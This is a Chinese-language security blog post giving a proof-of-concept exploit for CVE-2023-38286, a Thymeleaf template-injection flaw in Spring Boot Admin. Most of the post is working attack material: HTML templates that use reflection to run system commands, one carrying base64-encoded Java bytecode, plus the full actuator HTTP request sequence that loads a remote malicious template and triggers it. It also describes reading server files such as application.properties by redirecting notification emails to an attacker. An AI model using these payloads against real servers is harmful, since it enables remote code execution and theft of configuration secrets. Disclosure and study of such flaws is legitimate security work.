SpringBootAdmin-thymeleaf-SSTI 可能导致 RCE【分析】

渗透技巧 1年前 (2023) admin

753 0 0

SpringBootAdmin-thymeleaf-SSTI 可能导致 RCE【分析】

CVE-2023-38286

https://nvd.nist.gov/vuln/detail/CVE-2023-38286

附加漏洞描述

这里提到的沙箱绕过是指绕过Thymeleaf的某些黑名单，而不是利用上下文进行基于反射的逃逸或类似技术。

影响

所有运行 Spring Boot Admin Server、启用 MailNotifier 并通过 UI 对环境变量进行写访问的用户都可能受到影响。

# 2023-07-05spring-boot-admin <= 3.1.0thymeleaf <= 3.1.1.RELEASE

该漏洞影响的产品及版本范围：

远程代码执行POC

所有证明环境均从此 github 存储库提供。

当您启动了springboot-admin环境后，您可以按照以下步骤获取shell：

首先，编写一个名为poc3.html的html：

<!DOCTYPE html><html xmlns:th="http://www.thymeleaf.org"><head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/></head><body>
<tr        th:with="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}">    <td>        <a                th:with="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"        >            <a                    th:with="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"            >                <a                        th:with="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )                }"                        th:href="${param2}"                ></a>            </a>
        </a>    </td></tr>
</body></html>

然后将poc3.html放入您的VPS，并启动spring-boot-admin应用程序可以访问的HTTPServer。

然后发送此 HTTP 包以启用 MailNotifier：

POST /actuator/env HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestX-SBA-REQUEST: trueConnection: closeReferer: http://127.0.0.1:8080/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originsec-ch-ua-platform: "macOS"sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Content-Type: application/jsonContent-Length: 63
{"name":"spring.boot.admin.notify.mail.enabled","value":"true"}

发送这个HTTP包来修改电子邮件模板，这是我们的恶意html文件的地址。

POST /actuator/env HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestX-SBA-REQUEST: trueConnection: closeReferer: http://127.0.0.1:8080/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originsec-ch-ua-platform: "macOS"sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Content-Type: application/jsonContent-Length: 91
{"name":"spring.boot.admin.notify.mail.template","value":"http://127.0.0.1:4578/poc3.html"}

发送此HTTP包来刷新修改：

POST /actuator/refresh HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36Accept: application/jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestX-SBA-REQUEST: trueConnection: closeReferer: http://127.0.0.1:8080/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originsec-ch-ua-platform: "macOS"sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Content-Type: application/jsonContent-Length: 2
{}

最后，将此HTTP包发送到spring-boot-admin应用程序以触发离线通知，您将立即获得shell。

POST /instances HTTP/1.1Accept: application/jsonContent-Type: application/jsonUser-Agent: Java/17.0.6Host: 127.0.0.1:8080Content-Length: 178
{"name":"test","managementUrl":"http://127.0.0.1:1","healthUrl":"http://127.0.0.1:1","serviceUrl":"http://127.0.0.1:1","metadata":{"startup":"2024-09-04T14:49:12.6694287+08:00"}}

任意文件读取 POC

当您配置邮件通知成功后，例如：

那么你可以将MailNotifier的模板属性配置为springboot-admin主机的本地文件或springboot-admin应用程序的类路径下的文件，然后将MailNotifier的收件人修改为恶意攻击者。当触发电子邮件通知时，恶意攻击者将收到相应的模板属性文件，从而导致任意文件读取。

如果你修改MailNotifier的模板属性为springboot-admin应用程序的类路径下的文件，你甚至可以获得application.properties文件。

漏洞分析

漏洞产生的原因是springboot-admin使用thymeleaf进行HTML渲染，而thymeleaf存在沙箱绕过漏洞。如果thymeleaf渲染恶意HTML，可以利用thymeleaf沙箱逃逸造成RCE；同时，如果攻击者可以使用actuator将MailNotifier的template属性更改为远程html模板，那么springboot-admin就会从攻击者的服务器加载恶意html并使用thymeleaf进行渲染，从而引发RCE；如果MailNotifier的模板属性被修改为服务器本地文件或classpath会导致任意文件读取；

springboot-admin中使用thymeleaf渲染HTML的关键位置如下：

SpringBootAdmin-thymeleaf-SSTI 可能导致 RCE【分析】

如果将“this.template”修改为远程文件，例如“ http://xxx.xx/poc.html ”，则将从远程加载html文件并进行渲染。利用thymeleaf的沙箱逃逸漏洞，可以进行RCE；

以下是三个thymeleaf沙箱逃逸poc：

1.此poc适用于JDK9之前的版本：

<!DOCTYPE html><html xmlns:th="http://www.thymeleaf.org"><head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/></head><body>
<tr        th:with="defineClassMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('org.springframework.cglib.core.ReflectUtils',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'defineClass', ''.getClass() ,''.getBytes().getClass(), T(org.springframework.util.ClassUtils).forName('java.lang.ClassLoader',T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )}">    <td>        <a                th:with="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(defineClassMethod, null,                    'fun.pinger.Hack',                    T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQAKgoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAoBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMSGFjazsBAAg8Y2xpbml0PgEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlBwAdAQAKU291cmNlRmlsZQEACUhhY2suamF2YQwACgALBwAiDAAjACQBAARjYWxjDAAlACYBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAAoAJwEABEhhY2sBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgEAD2Z1bi9waW5nZXIvSGFjawEAEUxmdW4vcGluZ2VyL0hhY2s7ACEACAAJAAAAAAACAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAAwAOAAAADAABAAAABQAPACkAAAAIABEACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAABwAJAAoADAAIAA0ACQAWAAsADgAAAAwAAQANAAkAEgATAAAAFAAAAAcAAkwHABUJAAEAFgAAAAIAFw=='),                    new org.springframework.core.OverridingClassLoader(T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )                }"                th:href="${param2}"        ></a>    </td></tr>
</body></html>

2.本POC适用于JDK9之后的版本：

<!DOCTYPE html><html xmlns:th="http://www.thymeleaf.org"><head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/></head><body>
<tr        th:with="createMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'create' )}">    <td>        <a                th:with="shellObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(createMethod, null)}"        >            <a                    th:with="evalMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'eval', ''.getClass() )}"            >                <a                        th:with="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(evalMethod, shellObj,  new java.lang.String(T(org.springframework.util.Base64Utils).decodeFromString('amF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoImNhbGMiKQ==')))                }"                        th:href="${param2}"                ></a>            </a>
        </a>    </td></tr>
</body></html>

3.该POC适用于所有版本的JDK：

<!DOCTYPE html><html xmlns:th="http://www.thymeleaf.org"><head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/></head><body>
<tr        th:with="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}">    <td>        <a                th:with="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"        >            <a                    th:with="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"            >                <a                        th:with="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )                }"                        th:href="${param2}"                ></a>            </a>
        </a>    </td></tr>
</body></html>